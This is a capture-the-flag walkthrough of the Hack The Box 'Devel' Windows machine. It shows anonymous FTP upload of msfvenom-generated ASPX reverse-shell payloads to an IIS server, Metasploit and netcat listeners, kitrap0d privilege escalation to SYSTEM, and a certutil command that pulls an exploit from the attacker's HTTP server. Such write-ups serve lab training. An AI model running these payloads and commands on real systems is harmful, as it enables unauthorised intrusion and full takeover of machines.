Hackthebox - Devel

  • Windows


└─# nmap -T4 -sC -sV -p- --min-rate=1000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 10:58 EDT
Nmap scan report for
Host is up (0.028s latency).
Not shown: 65533 filtered tcp ports (no-response)
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-25-22  08:20PM                 2924 devel.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.38 seconds


We are allowed to connect anonymously, when looking at the files listed on the nmap scan, it seems that these are the files available on the webserver. It seems like we can list directory Can we upload files and access them through the web server?

└─# ftp                                 
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode: on; fallback to active mode: on.
ftp> ls
229 Entering Extended Passive Mode (|||49210|)
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          aspnet_client
03-25-22  08:20PM                 2924 devel.aspx
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

We can create an hello.html file with just hello in it.

ftp> put hello.html
local: hello.html remote: hello.html
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************************************|     7      341.79 KiB/s    --:-- ETA
226 Transfer complete.
7 bytes sent in 00:00 (0.28 KiB/s)

This means we could try to execute code, as this is a windows webserver we need a shell compatible with windows.

Initial foothold with Meterpreter

Let's generate one with msfvenom

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > meterpreter.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2874 bytes

Now we need to launch metasploit to setup our listener

  • msf6 > use exploit/multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost tun0

  • set lport 5555

  • exploit -j

We can get back to the ftp and put our exploit in there:

ftp> put meterpreter.aspx
local: meterpreter.aspx remote: meterpreter.aspx
229 Entering Extended Passive Mode (|||49221|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************************************|  2911       61.69 MiB/s    --:-- ETA
226 Transfer complete.
2911 bytes sent in 00:00 (83.02 KiB/s)

And now we can go to our webpage and access our exploit And we can see on out metasploit that we have a shell!

msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> ) at 2022-03-26 11:49:12 -0400

Active sessions

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL ->  (

Let's interact with our session:

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 
  • Let's see who we are:

meterpreter > getuid
Server username: IIS APPPOOL\Web
  • Let's get info on our target machine:

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

Enumerate System

  • In meterpreter lets swhitch to a shell using shell command

  • systeminfo


Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          25/3/2022, 8:10:48 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.450 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.541 MB
Virtual Memory: In Use:    600 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::61ec:4277:9347:6901
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e

We know we are on windows 7, the owner is babis and the hostname is devel

  • WinPeas does not work

  • Powershell does not work

  • We can see what exploit are suggested through meterpreter exploit suggester

meterpreter > run post/multi/recon/local_exploit_suggester
[*] - Collecting local exploits for x86/windows...
[*] - 40 exploit checks are being tried...
[+] - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Privilege escalation with Meterpreter

  • use exploit/windows/local/ms10_015_kitrap0d

  • Set the session to the session you have on the target (mine is 7) set session 7

  • Set the lhost set lhost tun0

  • set the lport to a free port I am going to use 5556 set lport 5556

  • exploit

And it worked

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Initial foothold with netcat

  • msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > netcat.aspx

  • We put our file in the ftp put netcat.aspx

  • We launch our listener and catch our shell by browsing to the file rlwrap nc -lvp 5555

└─# rlwrap nc -lvp 5555                                                  
listening on [any] 5555 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 49239
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Privesc without Meterpreter

  • If we go to C:\User\Public we have writing rights and we are able to download an exploit we can ty this one

  • first we download it in our attacking machine

  • Then we launch a python simple http server python3 -m http.server 80

  • And we can download it in our target certutil.exe -urlcache -f exploit.exe

  • We launch a listener rlwrap nc -lvp 5556

  • We launch the exploit exploit.exe 5556

  • We get a shell as authority\system:

    nt authority\system


We can get the flags in their usual place (with a win cmd we can use type instead of cat):

  • The user one is here cat c:\\Users\\babis\\Desktop\\user.txt

  • The root one is here cat C:\\Users\\Administrator\\Desktop\\root.txt


As usual there is more than one way to do it :)

Resource about the exploit

Last updated